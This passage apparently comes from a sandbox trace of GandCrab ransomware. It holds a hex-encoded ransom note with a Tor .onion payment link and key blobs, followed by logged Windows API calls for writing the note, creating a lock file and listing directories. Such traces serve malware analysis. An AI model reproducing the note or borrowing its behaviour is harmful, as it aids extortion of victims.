6\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0097.021] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0097.022] CloseHandle (hObject=0x230) returned 1 [0097.022] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.022] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.023] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0x14c)) [0097.023] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.023] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0097.023] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0097.023] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\Downloads\\d2ca4a09d2ca4deb61a.lock") returned 50 [0097.023] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\public\\downloads\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0097.024] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.025] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.025] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\") returned 26 [0097.025] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Downloads\\*") returned="C:\\Users\\Public\\Downloads\\*" [0097.025] FindFirstFileExW (in: lpFileName="C:\\Users\\Public\\Downloads\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x503678 [0097.025] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0097.025] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.026] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0097.026] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0097.026] 